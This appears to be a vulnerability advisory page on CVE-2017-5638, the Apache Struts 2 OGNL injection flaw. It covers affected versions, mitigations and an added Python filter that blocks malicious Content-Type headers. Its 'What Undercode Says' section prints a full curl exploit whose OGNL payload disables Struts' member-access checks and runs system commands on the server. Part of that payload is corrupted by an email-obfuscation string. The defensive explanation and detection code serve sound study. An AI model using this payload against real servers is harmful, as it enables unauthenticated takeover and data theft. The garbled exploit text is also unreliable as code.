The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent in a file upload request, the parser incorrectly processes it, attempting to evaluate the header’s value as an Object-Graph Navigation Language (OGNL) expression. OGNL is a powerful expression language integrated with Struts that can execute Java code and access the application’s context. An attacker can craft a Content-Type header containing a malicious OGNL expression. Because the parser fails to properly sanitize this input, the expression is interpreted and executed on the server side. This allows the attacker to achieve remote code execution with the same privileges as the Struts application server, enabling them to run arbitrary system commands, exfiltrate data, or gain complete control over the vulnerable system. The attack is particularly dangerous as it does not require authentication and can be performed over the network.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07
Prediction: Patch Available
What Undercode Says:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://vulnerable-server.com/struts2-blank/example/Upload.action`
How the Exploit Works:
A malicious Content-Type header is crafted.
It is sent in an HTTP file upload request.
The OGNL expression is executed server-side.
Arbitrary commands are injected.
Protection from this CVE:
Apply vendor patch immediately.
Upgrade to Struts 2.3.32 or 2.5.10.1.
Implement WAF filtering rules.
Sanitize all file upload headers.
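The WAF and header checks listed above can be sketched as a filter that rejects any Content-Type value that is not a well-formed media type or that contains an expression opener. This is an added example, not code from the original page or from Apache Struts; the function names, sample addresses and sample header values are constructed for illustration, and such a filter supplements the upgrade rather than replacing it.

```python
import re

# Grammar from RFC 7230/7231: type "/" subtype *( ";" name "=" value )
TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
QUOTED = r'"(?:[^"\\]|\\.)*"'
MEDIA_TYPE = re.compile(
    rf"{TOKEN}/{TOKEN}(?:\s*;\s*{TOKEN}=(?:{TOKEN}|{QUOTED}))*"
)
# "%{" and "${" open an OGNL expression; neither belongs in a media type.
EXPR_OPEN = re.compile(r"[%$]\{")


def inspect_content_type(value):
    """Return (verdict, reason) for one Content-Type header value."""
    value = value.strip()
    if EXPR_OPEN.search(value):
        return "block", "expression delimiter"
    if not MEDIA_TYPE.fullmatch(value):
        return "block", "malformed media type"
    return "allow", "ok"


# Constructed sample requests: (source address, path, Content-Type).
# The expression samples are inert fragments, not working payloads.
SAMPLES = [
    ("198.51.100.7", "/example/Upload.action",
     "multipart/form-data; boundary=----FormBoundary7MA4YWxk"),
    ("198.51.100.7", "/example/Login.action",
     "application/x-www-form-urlencoded"),
    ("203.0.113.9", "/example/Upload.action",
     "%{(#t='multipart/form-data')}"),
    ("203.0.113.9", "/example/Upload.action",
     "multipart/form-data; boundary=\"${1+1}\""),
    ("203.0.113.9", "/example/Upload.action",
     "multipart/form-data (probe)"),
]


def scan(requests):
    """Return the requests a filter in front of Struts should reject."""
    hits = []
    for src, path, ctype in requests:
        verdict, reason = inspect_content_type(ctype)
        if verdict == "block":
            hits.append((src, path, reason))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLES):
        print(hit)
```

The fourth sample passes the media-type grammar because the expression sits inside a quoted parameter value, which is why the delimiter check runs separately from the grammar check.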
Impact:
Complete system compromise.
Unauthenticated remote code execution.
Data breach and theft.
Full application control.
Sources:
Reported By: nvd.nist.gov

